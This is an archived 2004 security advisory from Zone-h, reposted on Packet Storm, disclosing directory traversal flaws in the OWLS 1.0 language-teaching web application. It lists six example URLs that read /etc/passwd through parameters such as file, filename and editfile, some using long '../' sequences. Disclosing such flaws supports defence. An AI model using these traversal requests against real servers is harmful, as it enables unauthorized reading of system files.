exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZH2004-08SA.txt

ZH2004-08SA.txt
Posted Feb 18, 2004
Authored by G00db0y | Site zone-h.org

OWLS version 1.0 allows for remote file retrieval via directory traversal attacks.

tags | exploit, remote
SHA-256 | 13843490796feb811f362b4296313ee648e9ac12354d4bc7831e144c1b2970a5

ZH2004-08SA.txt

Change Mirror Download


ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving

Discovered: 05 january 2004

Vendor contacted: 07 january 2004

Published: 18 february 2004

Name: OWLS

Affected Systems: 1.0

Issue: Remote file retrieving

Author: G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org

Vendor: http://www.foolsworkshop.com/owls/



Description

***********

Zone-h Security Team has discovered a flaw in OWLS 1.0. There is a vulnerability in the current version of OWLS that allows an attacker to retrieve arbitrary files from the webserver with its priviledges.
"OWLS is a web-based environment for instructors of language to easily create exercises, readings, glossaries, and present media for their students. Once installed on a web server that supports PHP,
instructors can create materials or upload media for presentation to their students through a simple form based interface"


Details

*******


It's possibile for a remote attacker to retrieve any file from a webserver. Multiple files are affected with this problem.

For example try this:

http://address/owls/glossaries/index.php?file=/etc/passwd

http://address/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print

http://address/owls/readings/index.php?filename=/etc/passwd

http://address/owls/multiplechoice/resultsignore.php?filename=/etc/passwd

http://address/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd

http://address/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd



Solution:

*********

The vendor has been contacted and a patch was not yet produced.





G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org



http://www.zone-h.org/en/advisories/read/id=3973/
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close